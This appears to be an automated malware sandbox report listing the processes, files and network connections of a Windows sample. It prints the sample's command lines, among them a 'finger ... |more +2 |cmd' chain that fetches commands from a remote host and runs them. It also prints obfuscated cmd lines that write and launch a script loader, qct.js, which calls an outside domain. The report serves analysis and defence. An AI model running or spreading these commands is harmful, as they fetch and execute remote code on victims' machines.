Technical Information
Malicious functions
Creates and executes the following
- '<SYSTEM32>\finger.exe' ok@51iorc.cxvaer.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\qct.js"
Modifies file system
Creates the following files
- C:\users\public\qct.js
Network activity
Connects to
- '51####.cxvaer.xyz':79
- 'ue####.zxcsdtr.xyz':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'public-trust.com':80
TCP
- '51####.cxvaer.xyz':79
- 'cl###flare.com':443
UDP
- DNS ASK 51####.cxvaer.xyz
- DNS ASK ue####.zxcsdtr.xyz
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- DNS ASK public-trust.com
Miscellaneous
Executes the following
- '<SYSTEM32>\cmd.exe' /c finger ok@51iorc.cxvaer.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt CNOM=.j&&SEt EKUZO=vM40qarM40q a =M40q 'scM40qriM40qptM40q:'; b =M40q 'hM40qTtPM40q:'; GM40qetM40qObjM40qecM40qt(M40qa+b+'&&sET VS3V=RPHGKRPHGKueainh.zxcsdtr.xyzRPHGK?1RPHGK')&&sEt/...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 9W2TV="%EKUZO:M40q=%%VS3V:RPHGK=/%" 0<nul 1>C:\Users\Public\qct%CNOM%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\qct%CNOM%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\qct.js
